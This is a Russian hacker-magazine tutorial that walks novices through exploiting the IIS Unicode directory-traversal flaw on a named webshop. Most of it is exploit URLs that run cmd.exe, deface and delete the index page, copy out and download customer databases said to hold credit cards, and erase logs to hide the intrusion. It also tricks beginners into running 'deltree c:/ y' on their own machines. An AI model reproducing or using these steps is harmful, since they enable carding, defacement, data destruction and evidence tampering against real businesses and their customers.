Сразу говорю, что вся инфа для
ознакомительных целей !!! Тут не просто
пример, а настоящая дыра, которая еще
работает!!! То есть я проверял дыру перед
отправкой этой инфы 2 февраля в 4:15 она
работала !!! Поторопитесь!

Ты уже научился нюкать своих врагов? И даже
можешь определить айпи своего врага в чате ?
Но ты все еще не знаешь как хакеры получают
кредитки ? Ок значит эта статья для тебя !

Ты конечно же знаешь, что помимо виндов 98
существуют такие операционки как Linux, Unix,
WindowsNT. Вот о последней речь и пойдет. Эта
замечательная операционка в сочетании с
сервером ISS 4.0 /5.0 имеет UNICODE уязвимость. Что
это за уязвимость я напишу в следующий раз,
да и писали уже про это. Наша задача
научиться правильно воспользоваться
данной дырой, чтобы поиметь кред ! Данная
уязвимость позволяет получить командную
строку. Что это значит ? Ты че в досе не лазил
никогда что ли ! Ну ?! Знаешь в досе пишется c:\
вот это и есть командная строка, если ты еще
не хакер, то обязательно напиши себе в
командную строку deltree c:/ y, после чего нажми
на ENTER и ты станешь хакером! Извините, отошел
от темы, ну вот кто такое у себя напишет и на
ENTER нажмет, тот крутой хакер ! Ну надеюсь мы
разобрались, что такое командная строка. Те
кто тока что хакерами стали, ощутили мощь
командной строки на своем бедном винте. Ну
вот, эта UNICODE уязвимость позволяет получить
нам командную строку на сервере. Давайте
рассмотрим эту уязвимость на примере
сервера http://www.kaypro.com/. Да
да это крутой webshop, в котором в день по 100-900
покупок делают. А админы этого сервера даже
не подозревают, что в их сервере дыра ! Ну
хацкер, смотри на нее и любуйся.

http://www.kaypro.com/msadc/ ..%c0%af../..%c0%af../..%c0%af../ winnt/system32/cmd.exe?/c+dir+c:\

После того как ты это наберешь и нажмешь ENTER
твоему обзору предстанет полный список
файлов и директорий диска с:\ этого сервера !
Ну если ты умный ламер, то ты поймешь, почему
я тут про дос базарил! А для начинающих
хацкеров скажу: видите в самом конце адреса
написано dir+c:\ Сразу объясняю + это пробел !!!
Ну догадались, ну конечно же если набрать в
досе dir c:\ и нажать ENTER, на экран выльется все
содержимое диска с !! Ну сейчас нам не
каталоги разглядывать хочется, а кред
поиметь, тем более что мы знаем, что это webshop.
Итак, ищем каталог wwwroot. Да весь диск c:\
облазили, а такого каталога найти не смогли,
но не отчаивайся уважаемый ламер, сейчас я
тебя научу искать этот каталог. В данной
ситуации, на ISS то бишь, он практически
всегда находиться в каталоге INETPUB Да знаю я,
что нет такого каталога на диске c:\! Поэтому
предлагаю вам пройти чуточку вперед. Вперед
это куда спросите вы? Ну разумеется на диск D:\,
куда ж еще !
Ну вот видите я же говорил, что есть такой
каталог, просто он на этом серваке на диске d
находится. Для особо умных показываю, как
перейти на диск d:\

http://www.kaypro.com/msadc/ ..%c0%af../..%c0%af../..%c0%af../ winnt/system32/cmd.exe?/c+dir+d:\

Теперь нам надо зайти в этот каталог (inetpub),
это делается просто! Припишите в конец
адреса у вас в браузуре /inetpub Только слеш в
конце не ставьте, выглядит это вот как 

http://www.kaypro.com/msadc/ ..%c0%af../..%c0%af../..%c0%af../ winnt/system32/cmd.exe?/c+dir+d:\inetpub\

У тех, кто хорошо знает дос вообще проблем
не будет! Вот мы видим каталог wwwroot в этом
каталоге находятся файлы для публикации в
интернете. Ну зайди на http://www.kaypro.com и увидишь

Вот мы вошли в wwwroot, адрес у нас выгладит так 

http://www.kaypro.com/msadc/ ..%c0%af../..%c0%af../..%c0%af../ winnt/system32/cmd.exe?/
c+dir+d: \inetpub\wwwroot\

Теперь надо сказать админам, что мы хакеры и
что мы разгромили их страничку — это просто !
Берем копируем наш файлик cmd.exe в каталог /msadc/.
Как это сделать? Просто вот вам команда!

http://www.kaypro.com/msadc/ ..%c0%af../..%c0%af../..%c0%af../ winnt/system32/cmd.exe?/
c+copy+c:\winnt\ system32\cmd.exe+c:\progra~1\ common~1\ system\msadc\cmd1.exe

Что нам это дало ? Ну во-первых, теперь юзать
дырку мы будем через короткий адрес, а
точнее,
http://www.kaypro.com/msadc/cmd1.exe?/c+dir+d:\

Согласитесь, так удобней ! Вот теперь мы
можем расписать страничку этих ламов ! А
делается это так !

http://www.kaypro.com/msadc/cmd1.exe?/ c+@echo Здесь был хакер
Володя !!! > d:\inetpub\wwwroot\index.htm

Теперь при входе на www.kaypro.com мы увидим
надпись "Здесь был хакер Володя" в
самом низу странички ! 
Но это еще не самое прикольное, можно убить
эту страничку то, есть, кто знает, что за html
команда <plaintext>, тот знает, как
прикольнуться ! Ну а для особо жестоких
можно вообще удалить эту страничку index.htm,
тогда при входе на www.kaypro.com мы будем видеть
содержание каталога d:\inetpub\wwwroot\ Как это
делать ? Просто! http://www.kaypro.com/msadc/cmd1.exe?/ c+del+d:\inetpub\wwwroot\index.htm 

После запуска такого адреса страничка index.htm
сотрется. Впрочем, мона так стереть все, что
захочется у них на дисках !!! 

Я вас подготавливал к самому главному,
теперь нам надо поиметь креды с их дисков!!!!
Креды находятся в  d:\inetpub\wwwroot\databases\ я это
узнал за вас ! Набираем вот такой адрес 

http://www.kaypro.com/msadc/cmd1.exe? /c+dir+d:\ inetpub\wwwroot\databases\

Ну и зачем мы сюда пришли спросите вы? И че
это за файлы с расширением *.mdb??? Уважаемые,
если вы дочитали до этого момента мою
статью, значит сейчас вы поимеете кред !!! В
этих файлах кред столько, что на пол России
хватит! Особенно в той базе, что на 250 метров
— она просто забита кредами !!!! Но самая
хорошая база это kaypro.mdb, в ней самые крутые
креды! Ну Ну, давай говори, как их поиметь !!!!
Ну куда вы так торопитесь, все по порядку!!!
Как вы поняли эти базы отсюда скачать
невозможно. Ну че ты так расстроился, ламер ?
Какие проблемы, нам надо всего лишь
скопировать любую базу из этого каталога в
наш каталог /msadc/, это совсем просто. Помнишь,
как мы скопировали сюда (а мы находимся в
каталоге /msadc/ это из него мы просматриваем
все) файл cmd1.exe. Теперь нам надо скопировать
базу, вот как мы это делаем: 

http://www.kaypro.com/msadc/cmd.exe1?/ c+copy+d:\inetpub\ databases\
kaypro.mdb+c:\progra~1\ common~1\system\msadc\kaypro.mdb

Вот и все, уважаемые, база ваша !!! Теперь
качаем ее. Для ламеров показываю как это
сделать !

http://www.kaypro.com/msadc/kaypro.mdb

После того, как мы наберем такой адрес база
начнет качаться !!!

Ну вот, пока качается база, заходим на http://www.hackarea.net,
смотрим, что там есть !!!! Посмотрели? Теперь
вы можете поприкалываться над серваком,
постирать там че-нить,  похакать, в конце
концов! Итак выкачали мы базу — теперь
заметем следы, ну а как это сделать любой
ламер знает!!! А для начинающих говорю:
стирайте все файлы с расширением *.log и все !

Вот вам настоящий рабочий пример ! Я думаю
что если такой инфы на хакере будет больше
то будет круто!!! Всего хорошего начинающие
хакеры ! Теперь я могу вас так называть..

Оставить мнение

Check Also

ФБР обвинило иранского правительственного хакера во взломе HBO и вымогательстве 6 млн долларов

ФБР и Министерство юстиции США, сообщили, что нашли виновного во взломе HBO и преждевремен…